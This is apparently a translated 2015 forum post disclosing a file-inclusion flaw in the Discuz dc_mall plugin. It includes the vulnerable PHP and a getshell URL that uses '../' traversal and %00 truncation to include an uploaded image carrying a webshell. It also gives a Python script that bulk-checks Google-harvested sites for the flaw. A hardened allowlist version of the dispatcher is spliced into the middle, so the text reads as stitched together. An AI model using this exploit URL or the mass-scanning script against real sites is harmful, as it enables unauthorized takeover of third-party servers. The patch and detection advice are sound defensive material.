
    A design flaw in a Discuz plugin allows front-end getshell

    Posted by 没穿底裤 on 2015-10-05 07:14:40

    #Plugin info:
    http://addon.discuz.com/?@dc_mall.plugin
    Official install count: 3000+ (that is already quite a few)

    #Test environment:
    PHP version: 5.2.9-2
    magic_quotes_gpc = off

    dc_mall.inc.php (the vulnerable file)

    <?php
    if(!defined('IN_DISCUZ')) {
    	exit('Access Denied');
    }
    $_lang = lang('plugin/dc_mall');
    $action = $_GET['action'] ? $_GET['action'] : 'index';
    $version ='Ver 1.1.1';
    $cvar = $_G['cache']['plugin']['dc_mall'];
    $file = DISCUZ_ROOT.'./source/plugin/dc_mall/module/index/'.$action.'.inc.php';//the action parameter goes into $file without any filtering; truncate the trailing part with %00 and any file can be included

    if (!file_exists($file)||!$cvar['open']) showmessage('undefined_action');
    $usercredit = getuserprofile('extcredits'.$cvar['credit']);
    $mallnav = C::t('#dc_mall#dc_mall_sort')->getdata();
    $sortid = dintval($_GET['sortid']);
    if(empty($mallnav[$sortid]))$sortid=0;
    @include $file;
    $croppath = DISCUZ_ROOT.'./source/plugin/dc_mall/data/cron.php';
    $cronupdate = @include $croppath;
    if(TIMESTAMP-$cronupdate['timestamp']>$cvar['autotime']*60){
    	require_once DISCUZ_ROOT.'./source/plugin/dc_mall/cache/cache_mallinfo.php';
    	build_cache_plugin_mallinfo();
    	$configdata = 'return '.var_export(array('timestamp'=>TIMESTAMP), true).";\n\n";
    	if($fp = @fopen($croppath, 'wb')) {
    		fwrite($fp, "<?php\n//plugin mall temp upgrade check file, DO NOT modify me!\n//Identify: ".md5($configdata)."\n\n$configdata?>");
    		fclose($fp);
    	}
    }
    include template('dc_mall:index/'.$action);
    ?>

    #Inclusion test
    #getshell
    Getting a shell needs no further explanation: upload an image with a webshell embedded through the front end, then include it directly and it works.
    www.xxx.com/plugin.php?action=../../../../../data/attachment/forum/201508/02/153404ryzl4yytgyz4yjrl.jpg%00&id=dc_mall
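The root cause above is that $action is concatenated into an include path unchecked. The following is an added example, not the dc_mall plugin's own code, showing how the dispatcher can be hardened: it builds an allowlist from the module files that actually exist in the plugin's module directory (the directory layout is taken from the code above) and only accepts an action that is a plain module name on that list. Note that the %00 truncation works here because the test environment is PHP 5.2.9; PHP 5.3.4 and later reject paths containing a NUL byte, but the traversal itself (an action containing ../ with the appended .inc.php suffix) is still reachable, so the fix should be the allowlist rather than reliance on the PHP version.

```php
<?php
// Added example, not the plugin's original code: hardened action dispatch.
// Assumes the same module directory layout as the vulnerable file above.

if(!defined('IN_DISCUZ')) {
    exit('Access Denied');
}

$_lang = lang('plugin/dc_mall');
$version = 'Ver 1.1.1';
$cvar = $_G['cache']['plugin']['dc_mall'];

$moduledir = DISCUZ_ROOT.'./source/plugin/dc_mall/module/index/';

// Derive the allowlist from the files that really exist in the module directory,
// so a request can only ever select one of them. basename() strips the path and
// the '.inc.php' suffix, leaving just the module name.
$allowed = array();
foreach (glob($moduledir.'*.inc.php') as $path) {
    $allowed[] = basename($path, '.inc.php');
}

$action = isset($_GET['action']) ? (string)$_GET['action'] : 'index';

// Accept only a plain module name: letters, digits and underscore, nothing else.
// \z (not $) so a trailing newline cannot slip past the check. The strict
// in_array() comparison then ties the value to a known file, which closes the
// '../' traversal and the '%00' truncation regardless of PHP version.
if (!preg_match('/^[a-z0-9_]+\z/', $action) || !in_array($action, $allowed, true)) {
    showmessage('undefined_action');
}

if (!$cvar['open']) {
    showmessage('undefined_action');
}

// $file is now composed only from trusted parts plus a validated module name.
$file = $moduledir.$action.'.inc.php';

$usercredit = getuserprofile('extcredits'.$cvar['credit']);
$mallnav = C::t('#dc_mall#dc_mall_sort')->getdata();
$sortid = dintval($_GET['sortid']);
if (empty($mallnav[$sortid])) {
    $sortid = 0;
}

// No error suppression: a failing include should surface in the logs, not be hidden.
include $file;

// The template name is built from the same validated $action.
include template('dc_mall:index/'.$action);
?>
```

With this check in place a request such as the one shown above is rejected at the preg_match stage (the value contains '/' and '.'), and a log entry for an 'undefined_action' response on plugin.php with id=dc_mall and a traversal or %00 sequence in action is a reasonable detection signal for attempts against the unpatched version.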

    Collected a batch of targets from Google in bulk.

    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    # Bulk check: for every site in dz.txt, request robots.txt through the
    # unfiltered action parameter and print the host if the include succeeded.
    from urllib.parse import urlsplit
    import requests


    def exp():
        # dz.txt holds one full URL (with scheme) per line, as harvested from Google
        for line in open("dz.txt"):
            target = line.strip()
            if not target:
                continue
            host = urlsplit(target).netloc
            url = "http://" + host + "/plugin.php?action=../../../../../robots.txt%00&id=dc_mall"
            try:
                res = requests.get(url)
                # the body of robots.txt coming back means the file was included
                if "robots.txt" in res.text:
                    print(host)
            except Exception:
                pass


    if __name__ == '__main__':
        exp()
